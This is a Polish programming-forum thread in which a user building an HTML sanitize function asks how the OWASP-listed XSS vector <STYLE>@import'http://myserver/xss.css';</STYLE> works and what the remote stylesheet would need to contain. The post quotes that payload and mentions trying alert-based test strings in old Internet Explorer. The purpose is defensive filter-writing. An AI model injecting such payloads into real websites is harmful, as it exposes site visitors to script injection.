 [JavaScript][inne][PHP]Xss - Atak poprzez <STYLE>@import'http://myserver/xss.css';</STYLE> |
| [JavaScript][inne][PHP]Xss - Atak poprzez <STYLE>@import'http://myserver/xss.css';</STYLE> |
 1.09.2014, 15:00:17
Post
#1
|
|
|
Grupa: Zarejestrowani Postów: 2 Pomógł: 0 Dołączył: 1.09.2014 Ostrzeżenie: (0%) 
 |
Cześć.
Próbuję napisać funkcję sanitize, jest prawie ukończona, ale nie rozumiem jednego z wektorów ataku, cytat z https://www.owasp.org/index.php/XSS_Filter_...le_sheet_part_2 : Remote style sheet part 2 This works the same as above, but uses a STYLE tag instead of a LINK tag. A slight variation on this vector was used to hack Google Desktop. As a side note, you can remove the end /STYLE tag if there is HTML immediately after the vector to close it. This is useful if you cannot have either an equals sign or a slash in your cross site scripting attack, which has come up at least once in the real world: <STYLE>@import'http://myserver/xss.css';</STYLE> Chodzi o to, co miałbym wstawić do pliku myserver/xss.css aby cokolwiek uzyskać? Próbowałem alert('xss'), oraz <script>alert('xss')</script> żadne nic ciekawego nie robi. Próbuję w IE <=8 bo podobno tylko tam to działa. |
 |
 
|
klaupadiusz [JavaScript][inne][PHP]Xss - Atak poprzez <STYLE>@import'http://myserver/xss.css';</STYLE> 1.09.2014, 15:00:17 
Pyton_000 http://security.stackexchange.com/question...when-... 1.09.2014, 16:50:21 viking A po co sam to piszesz skoro od dawna jest bibliot... 1.09.2014, 16:52:04 tzm He... identycznie jak u mnie na praktykach. Te sam... 1.09.2014, 17:43:46 konrados test 1.09.2014, 20:40:59 
klaupadiusz Cytat(viking @ 1.09.2014, 17:52:04 ) ... 1.09.2014, 20:44:49   |
|
Wersja Lo-Fi | Aktualny czas: 24.07.2025 - 15:33 |
